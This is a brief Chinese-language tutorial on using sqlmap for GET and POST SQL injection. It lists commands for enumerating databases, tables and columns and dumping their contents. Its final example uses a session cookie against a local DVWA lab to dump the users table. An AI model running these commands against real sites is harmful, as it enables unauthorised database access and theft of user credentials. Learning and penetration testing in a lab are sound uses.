1get型注入
1.1检查注入点
python sqlmap.py -u "xxxx网站"
1.2查看数据库
python sqlmap.py -u "xxxx网站" --dbs
1.3查看数据库中的表
python sqlmap.py -u "xxxx网站" -D 数据库名 --tables
1.4查看数据库中的表的列
python sqlmap.py -u "xxxx网站" -D 数据库名 -T 表名 --columns
1.5查看数据库中的表中所有内容
python sqlmap.py -u "xxxx网站" -D 数据库名 -T 表名 --columns --dump
2post型注入
2.1首先需要拦截包,然后以txt的形式保存到sqlmap路径下
2.2查看数据库中的表中所有内容
python sqlmap.py -r 文件名字.txt -D 数据库名 -T 表名 --columns --dump
tips:
1:post和get型注入在sqlmap中的使用只在于 get中是 -u “url” 而post是 -r 文件名.txt
2:-p 传输的参数名 可以指定本次注入参数
补充
带有登录凭证的页面是需要登录凭证的,所以使用sqlmap时也要带上登录凭证。
网页F12查看,点击存储
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=84nrp5ikbuiv4dte1hi2ggjbd6;security=low" -D dvwa -T users --columns --dump